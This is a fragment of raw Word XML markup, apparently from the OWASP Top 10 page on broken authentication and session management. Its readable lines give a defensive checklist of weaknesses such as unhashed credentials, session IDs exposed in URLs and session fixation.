          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>External</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30140E2A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77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4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mman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jection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C703BB3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89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Q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jection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48AEFEB8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5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564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6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6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ibernat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6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jection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C6EB7A0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3E876CB6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2304"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="1331" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="456E5AB8">
          <v:shape id="_x0000_s2723" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:74.3pt;width:570pt;height:229.05pt;z-index:251645440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2449D9C7" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="101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422E7428" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="775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0B2AFC86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B2659EE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="499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5954AA3E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201401DD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="509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3A983FFF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7DDBE2C3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="551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77975DD4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4F78C20" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="497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27C74FB7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77DDEA1C" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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03466E8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="429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355CB44A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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407D44D6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="50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20C6AA4C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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007FF650" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="3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WIDESPREA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B200"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="4819003A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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022A8E83" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="5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35A9E393" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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518C49C8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="5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SEVER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DF76429" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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66CA3EF3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3812723E" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="234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76B1B5A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</w:p>
                      <w:p w14:paraId="030503D2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onymous</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="727044A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ter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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="580607A5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ith</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7A601B0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i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w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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="53F9F6CB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empt</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="377DB15F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te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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6C0A6B5E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o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ther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</w:p>
                      <w:p w14:paraId="66C5D787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siders</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4EEA42EA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an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sguise</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0C15E1EE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i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tion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E890F8C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eaks</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2B264E85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779F03E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entic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2A66A378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ssion</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3E99FC8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agement</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="347A6B6A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(e.g.,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="57779234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os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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2130C6C9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ssword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ssion</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6746C417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Ds)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ersonate</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="20DD939A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F744E57" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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velop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equen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i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ustom</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5BEE3FD0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entic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ss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agement</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5E12F117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cheme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ild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rrec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17B7FA17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rd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sul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usto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chemes</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="08020C1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equen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</w:p>
                      <w:p w14:paraId="51959522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ogou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sswor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agemen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imeouts,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="72871297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memb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e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cre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question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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="42E11182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pdate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tc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ind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</w:p>
                      <w:p w14:paraId="4F697C5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tim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fficul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ch</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1CD521AE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lement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ique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779C988" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="56353E85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ow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ven</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="53AC658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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t>a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</w:p>
                      <w:p w14:paraId="17BFFDDB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d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nce</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3B7A802B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cessful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6593C1A4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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7078B07A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th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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="61173AD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ivileged</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="53395A7E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</w:p>
                      <w:p w14:paraId="5A516E6F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equen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rgeted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106904A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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73DA12F0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101579E7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ffec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22F2438C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</w:p>
                      <w:p w14:paraId="43162747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.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="43EDAB54" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="320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0FD29BDF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a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1DB27223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ublic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osu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61D15E10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ulnerability.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="36B5739D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359B0F40">
          <v:shape id="wondershare_303" o:spid="_x0000_s2722" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:115.2pt;margin-top:4.5pt;width:327.2pt;height:77pt;z-index:-251670016;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="14AD51EE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="64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7F7F7F"/>
                      <w:w w:val="90"/>
                      <w:sz w:val="64"/>
                    </w:rPr>
                    <w:t>Broken</w:t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w w:val="90"/>
                      <w:sz w:val="64"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:noProof/>
                      <w:color w:val="7F7F7F"/>
                      <w:w w:val="90"/>
                      <w:sz w:val="64"/>
                    </w:rPr>
                    <w:t>Manageme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8A4CBE4">
          <v:shape id="imagerId163" o:spid="_x0000_s2721" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251964928;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId163" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="052EA1CE">
          <v:shape id="imagerId164" o:spid="_x0000_s2720" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251963904;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId164" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6902033F">
          <v:shape id="imagerId165" o:spid="_x0000_s2719" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251962880;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId165" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0D43768F">
          <v:shape id="imagerId166" o:spid="_x0000_s2718" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251957760;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId166" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="70280A49">
          <v:shape id="imagerId167" o:spid="_x0000_s2717" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251956736;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId167" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4B1F9784">
          <v:shape id="imagerId168" o:spid="_x0000_s2716" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251961856;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId168" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="16048CAE">
          <v:shape id="imagerId169" o:spid="_x0000_s2715" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251960832;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId169" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4795AE00">
          <v:shape id="imagerId170" o:spid="_x0000_s2714" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251959808;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId170" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="54411815">
          <v:shape id="imagerId171" o:spid="_x0000_s2713" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251958784;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId171" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6045AE8D">
          <v:shapetype id="_x0000_m2712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C4637A7">
          <v:shape id="_x0000_s2711" type="#_x0000_m2712" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25198336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CD1F91A">
          <v:shapetype id="polygon23" o:spid="_x0000_m2710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4E48F6">
          <v:shape id="WS_polygon23" o:spid="_x0000_s2709" type="#polygon23" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.5pt;width:543pt;height:3pt;z-index:25118668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C520280">
          <v:shapetype id="_x0000_m2708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136A92B">
          <v:shape id="WS_polygon24" o:spid="_x0000_s2707" type="#_x0000_m2708" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.7pt;width:543pt;height:3pt;z-index:25118771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790480BA">
          <v:shapetype id="_x0000_m2706" coordsize="600,20509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CCB62EC">
          <v:shape id="_x0000_s2705" type="#_x0000_m2706" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:72.3pt;width:6pt;height:205.05pt;z-index:25164748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619EBB3E">
          <v:shapetype id="_x0000_m2704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1822C9E">
          <v:shape id="_x0000_s2703" type="#_x0000_m2704" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.8pt;width:543pt;height:3pt;z-index:25164851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9F65CE0">
          <v:shapetype id="_x0000_m2702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B55CF0D">
          <v:shape id="_x0000_s2701" type="#_x0000_m2702" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:272.9pt;width:543pt;height:3pt;z-index:25164953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45F4D8C0">
          <v:shapetype id="_x0000_m2700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D2C0BF9">
          <v:shape id="_x0000_s2699" type="#_x0000_m2700" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25198233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DD44192">
          <v:shapetype id="polygon156" o:spid="_x0000_m2698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2E47061">
          <v:shape id="_x0000_s2697" type="#polygon156" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25198131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0B81A46">
          <v:shapetype id="polygon157" o:spid="_x0000_m2696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1D4AB85">
          <v:shape id="WS_polygon157" o:spid="_x0000_s2695" type="#polygon157" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251980288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66C50114">
          <v:shapetype id="polygon213" o:spid="_x0000_m2694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EC74E75">
          <v:shape id="WS_polygon213" o:spid="_x0000_s2693" type="#polygon213" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25197926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F19B173">
          <v:shapetype id="polygon222" o:spid="_x0000_m2692" coordsize="1162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7B9658B">
          <v:shape id="WS_polygon222" o:spid="_x0000_s2691" type="#polygon222" style="position:absolute;left:0;text-align:left;margin-left:386.5pt;margin-top:568.2pt;width:116.25pt;height:.55pt;z-index:-25197824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E793406">
          <v:shapetype id="_x0000_m2690" coordsize="205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ACDC2AA">
          <v:shape id="_x0000_s2689" type="#_x0000_m2690" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:578.15pt;width:205.3pt;height:.6pt;z-index:-25197721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2B1D099">
          <v:shapetype id="polygon231" o:spid="_x0000_m2688" coordsize="1450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A9C3314">
          <v:shape id="WS_polygon231" o:spid="_x0000_s2687" type="#polygon231" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:594.2pt;width:145.05pt;height:.6pt;z-index:-25197619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5607AA1">
          <v:shapetype id="polygon236" o:spid="_x0000_m2686" coordsize="1522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4D66B3">
          <v:shape id="WS_polygon236" o:spid="_x0000_s2685" type="#polygon236" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:610.2pt;width:152.25pt;height:.55pt;z-index:-25197516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169D6AA">
          <v:shapetype id="polygon241" o:spid="_x0000_m2684" coordsize="1714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45D187E">
          <v:shape id="WS_polygon241" o:spid="_x0000_s2683" type="#polygon241" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:626.15pt;width:171.45pt;height:.6pt;z-index:-25197414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281605B">
          <v:shapetype id="polygon246" o:spid="_x0000_m2682" coordsize="227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85A60F2">
          <v:shape id="WS_polygon246" o:spid="_x0000_s2681" type="#polygon246" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:642.2pt;width:227.5pt;height:.6pt;z-index:-25197312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E45EE3E">
          <v:shapetype id="polygon251" o:spid="_x0000_m2680" coordsize="201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BD1A18E">
          <v:shape id="WS_polygon251" o:spid="_x0000_s2679" type="#polygon251" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:658.2pt;width:201.95pt;height:.55pt;z-index:-2519720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42FA70A">
          <v:shapetype id="polygon258" o:spid="_x0000_m2678" coordsize="1766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281E8D">
          <v:shape id="WS_polygon258" o:spid="_x0000_s2677" type="#polygon258" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:690.2pt;width:176.6pt;height:.6pt;z-index:-2519710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528BAA1">
          <v:shapetype id="polygon263" o:spid="_x0000_m2676" coordsize="1400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68C56D5">
          <v:shape id="WS_polygon263" o:spid="_x0000_s2675" type="#polygon263" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:706.2pt;width:140pt;height:.55pt;z-index:-2519700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0EBE087">
          <v:shapetype id="polygon264" o:spid="_x0000_m2674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41168E6">
          <v:shape id="WS_polygon264" o:spid="_x0000_s2673" type="#polygon264" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25196902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AF1E878">
          <v:shapetype id="polygon265" o:spid="_x0000_m2672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6FFDD1">
          <v:shape id="WS_polygon265" o:spid="_x0000_s2671" type="#polygon265" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251968000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6C68F392">
          <v:shapetype id="polygon283" o:spid="_x0000_m2670" coordsize="168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1550E2B">
          <v:shape id="WS_polygon283" o:spid="_x0000_s2669" type="#polygon283" style="position:absolute;left:0;text-align:left;margin-left:316.8pt;margin-top:392.15pt;width:168.95pt;height:.6pt;z-index:-2519669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70D5148">
          <v:shapetype id="polygon292" o:spid="_x0000_m2668" coordsize="1398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4F3D97A">
          <v:shape id="WS_polygon292" o:spid="_x0000_s2667" type="#polygon292" style="position:absolute;left:0;text-align:left;margin-left:316.8pt;margin-top:438.2pt;width:139.8pt;height:.6pt;z-index:-251965952;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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position w:val="6"/>
          <w:sz w:val="96"/>
        </w:rPr>
        <w:t>A2</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="30"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="30"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C62580F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13D91E67" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B701F13" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6764E495" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A20950" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="774C0C17" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B78B9E1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217FB964" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF80433" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C5EE52" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285498CE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5076E895" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC57C7C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F459184" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEC4127" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048C6AF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F0012A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276958AA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7B3246" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044469F8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Am I Vulnerable to Hijacking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA20DF5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re session management assets like user credentials and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE590E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ession IDs properly protected? You may be vulnerable if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB3AE3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1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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>User authentication credentials aren’t protected when</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEF745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stored using hashing or encryption. See A6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6105FC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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2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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Credentials can be guessed or overwritten through weak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F47F2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account management functions (e.g., account creation,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7FFFB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change password, recover password, weak session IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D541DB2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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3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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Session IDs are exposed in the URL (e.g., URL rewriting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F040384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4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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Session IDs are vulnerable to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session fixation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
